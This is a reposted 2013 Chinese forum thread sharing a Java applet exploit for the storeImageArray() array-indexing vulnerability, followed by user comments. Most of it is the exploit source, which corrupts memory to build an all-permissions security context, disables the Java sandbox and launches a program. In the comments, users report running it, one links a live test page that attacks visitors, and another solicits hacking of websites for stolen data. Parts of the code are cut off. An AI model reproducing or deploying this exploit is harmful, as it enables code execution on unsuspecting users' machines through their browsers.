Java storeImageArray 漏洞

admin 2021年4月3日19:15:46评论22 views字数 7584阅读25分16秒阅读模式

Java storeImageArray 漏洞

园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-08-21 12:43

碰巧看到我就截个图,有点忙晚点看.

下载:PSA-2013-0811-1-exploit.tgz

Java storeImageArray() Invalid Array Indexing Vulnerability

import java.awt.image.*;
import java.awt.color.*;
import java.beans.Statement;
import java.security.*;

public class MyJApplet extends javax.swing.JApplet {

    /**
     * Initializes the applet myJApplet
     */
    @Override
    public void init() {
        /* Set the Nimbus look and feel */
        //
         /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.
          * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html
          */
        try {
            for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {
                 if ("Nimbus".equals(info.getName())) {
                    javax.swing.UIManager.setLookAndFeel(info.getClassName());
                    break;
                }
            }
        } catch (ClassNotFoundException ex) {
            java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
         } catch (InstantiationException ex) {
            java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
         } catch (IllegalAccessException ex) {
            java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
         } catch (javax.swing.UnsupportedLookAndFeelException ex) {
            java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
         }
        //

        /* Create and display the applet */
        try {
            java.awt.EventQueue.invokeAndWait(new Runnable() {
                public void run() {
                    initComponents();

                    // print environment info
          logAdd(
            "JRE: " + System.getProperty("java.vendor") + " " + System.getProperty("java.version") +
             "nJVM: " + System.getProperty("java.vm.vendor") + " " + System.getProperty("java.vm.version") +
                         "nJava Plug-in: " + System.getProperty("javaplugin.version") +
             "nOS: " + System.getProperty("os.name") + " " + System.getProperty("os.arch") + " (" + System.getProperty("os.version") + ")"
                     );

                }
            });
        } catch (Exception ex) {
            ex.printStackTrace();
        }
    }

    public void logAdd(String str)
    {
    txtArea.setText(txtArea.getText() + str + "n");
    }

  public void logAdd(Object o, String... str)
    {
        logAdd((str.length > 0 ? str[0]:"") + (o == null ? "null" : o.toString()));
     }

  public String errToStr(Throwable t)
  {
    String str = "Error: " + t.toString();
    StackTraceElement[] ste = t.getStackTrace();
    for(int i=0; i //GEN-BEGIN:initComponents
     private void initComponents() {

        btnStart = new javax.swing.JButton();
        jScrollPane2 = new javax.swing.JScrollPane();
        txtArea = new javax.swing.JTextArea();

        btnStart.setText("Run calculator");
        btnStart.addMouseListener(new java.awt.event.MouseAdapter() {
            public void mousePressed(java.awt.event.MouseEvent evt) {
                btnStartMousePressed(evt);
            }
        });

        txtArea.setEditable(false);
        txtArea.setColumns(20);
        txtArea.setFont(new java.awt.Font("Arial", 0, 12)); // NOI18N
        txtArea.setRows(5);
        txtArea.setTabSize(4);
        jScrollPane2.setViewportView(txtArea);

        javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
         getContentPane().setLayout(layout);
        layout.setHorizontalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
             .addGroup(layout.createSequentialGroup()
                .addContainerGap()
                .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 580, Short.MAX_VALUE)
                 .addContainerGap())
            .addGroup(layout.createSequentialGroup()
                .addGap(242, 242, 242)
                .addComponent(btnStart, javax.swing.GroupLayout.PREFERRED_SIZE, 124, javax.swing.GroupLayout.PREFERRED_SIZE)
                 .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
         );
        layout.setVerticalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
             .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup()
                 .addContainerGap()
                .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 344, Short.MAX_VALUE)
                 .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
                 .addComponent(btnStart)
                .addContainerGap())
        );
    }// //GEN-END:initComponents

    private boolean _isMac = System.getProperty("os.name","").contains("Mac");
    private boolean _is64  = System.getProperty("os.arch","").contains("64");

    // we will need ColorSpace which returns 1 from getNumComponents()
    class MyColorSpace extends ICC_ColorSpace
    {
        public MyColorSpace()
        {
            super(ICC_Profile.getInstance(ColorSpace.CS_sRGB));
        }

        // override getNumComponents
        public int getNumComponents()
        {
            int res = 1;
            //logAdd("MyColorSpace.getNumComponents() = " + res);
            return res;
        }
    }

    // we will need ComponentColorModel with the obedient isCompatibleRaster() which always returns true.
     class MyColorModel extends ComponentColorModel
    {
        public MyColorModel()
        {
            super(new MyColorSpace(), new int[]{8,8,8}, false, false, 1, DataBuffer.TYPE_BYTE);
         }

        // override isCompatibleRaster
        public boolean isCompatibleRaster(Raster r)
    {
      boolean res = true;
      logAdd("MyColorModel.isCompatibleRaster() = " + res);
      return res;
    }
    }

    private int tryExpl()
    {
    try {
            // alloc aux vars
            String name = "setSecurityManager";
            Object[] o1 = new Object[1];
            Object o2 = new Statement(System.class, name, o1); // make a dummy call for init

            // allocate byte buffer for destination Raster.
            DataBufferByte dst = new DataBufferByte(16);

            // allocate the target array right after dst
            int[] a = new int[8];
            // allocate an object array right after a[]
            Object[] oo = new Object[7];

            // create Statement with the restricted AccessControlContext
            oo[2] = new Statement(System.class, name, o1);

            // create powerful AccessControlContext
            Permissions ps = new Permissions();
            ps.add(new AllPermission());
            oo[3] = new AccessControlContext(
                new ProtectionDomain[]{
                    new ProtectionDomain(
                        new CodeSource(
                            new java.net.URL("file:///"),
                            new java.security.cert.Certificate[0]
                        ),
                        ps
                    )
                }
            );

            // store System.class pointer in oo[]
            oo[4] = ((Statement)oo[2]).getTarget();

            // save old a.length
            int oldLen = a.length;
            logAdd("a.length = 0x" + toHex(oldLen));

            // create regular source image
            BufferedImage bi1 = new BufferedImage(4,1, BufferedImage.TYPE_INT_ARGB);
             logAdd(bi1);

            // prepare the sample model with "dataBitOffset" pointing outside dst[] onto a.length
             MultiPixelPackedSampleModel sm = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4,1,1,4, 44 + (_is64 ? 8:0));
             // create malformed destination image based on dst[] data
            WritableRaster wr = Raster.createWritableRaster(sm, dst, null);
             BufferedImage bi2 = new BufferedImage(new MyColorModel(), wr, false, null);
             logAdd(bi2);

            // prepare first pixel which will overwrite a.length
            bi1.getRaster().setPixel(0,0, new int[]{-1,-1,-1,-1});

            // call the vulnerable storeImageArray() function (see ...jdksrcsharenativesunawtmedialibawt_ImagingLib.c)
             AffineTransformOp op = new AffineTransformOp(new java.awt.geom.AffineTransform(1,0,0,1,0,0), null);
             op.filter(bi1, bi2);

            // check results: a.length should be overwritten by 0xFFFFFFFF
            int len = a.length;
            logAdd("a.length = 0x" + toHex(len));
            if (len == oldLen) {
                // check a[] content corruption // for RnD
                for(int i=0; i 

[原文地址]

相关讨论:

1#

xiaoL | 2013-08-21 12:47

CVE-2013-2471??

2#

ppt (|hacking for |)|?(| nuf) | 2013-08-21 12:50

java就是一个bug

3#

小黑要低调 | 2013-08-21 14:01

mark

4#

国士无双 | 2013-08-21 14:12

这是要火的节奏...

5#

_Evil (年轻人切忌浮躁,性趣是最好的导师.) | 2013-08-21 14:20

强哥强哥我爱你,就像老鼠爱大米!

6#

z7y (我是z7y,我为小胖子代言!!) | 2013-08-21 14:38

园长弟弟V5 :P

7#

sinck | 2013-08-21 14:59

mark

8#

我真的不帅 | 2013-08-21 15:00

前排小板凳,瓜子,矿泉水,十五折批发。。。

9#

点点 (http://t.qq.com/ox_diandi) | 2013-08-21 15:27

哇 要火了

10#

邪恶魔法师 (骚货) | 2013-08-21 15:37

的确牛癖

11#

Nebula | 2013-08-21 15:37

你会发现,在win7的64位IE10浏览器中PoC是有问题的(32位正常)!那是什么原因了?

12#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-08-21 16:40

@z7y 我改了下打开页面输出z7y&vip成功了。

13#

VIP (Fatal error: Call to undefined function getwb() in /data1/www/htdocs/106/wzone/1/index.php on line 10|@齐迹@小胖子@z7y@nauscript|昨晚做梦梦见了一个ecshop注射0day,醒来后忘记在哪了。|预留广告位) | 2013-08-21 16:59

好牛逼,弹出cmd成功了

14#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-08-21 17:01

测试地址:http://www.lolbar.net/plus/img/face/calc.htm

弹个mstsc:

15#

我是小号 (我是小学生) | 2013-08-21 18:49

@xiaoL 嗯是的

http://www.exploit-db.com/exploits/27705/

16#

我是小号 (我是小学生) | 2013-08-21 18:49

强哥强哥我爱你,就像老鼠爱大米!

17#

乌帽子 (儿啊,到大城市切莫乱搞女人啊,染上什么病回来传染给) | 2013-08-21 21:37

@园长 肿么回事啊 提示我要安装抓哇他妈才给显示

18#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-08-21 21:39

@乌帽子 这个就是利用Java的applet漏洞在你本机执行恶意代码,亲不是getshell。

19#

Ocean | 2013-08-22 00:46

@园长 测试win8.1不成功

留言评论(旧系统):

年薪百万寻黑客 @ 2013-08-23 11:48:57

我QQ5248174 求大神入侵欧美网站拿数据 有兴趣可以加我QQ,年薪百万寻黑客!

本站回复:

[暂无回复]

文章来源于lcx.cc:Java storeImageArray 漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:15:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Java storeImageArray 漏洞https://cn-sec.com/archives/320635.html

发表评论

匿名网友 填写信息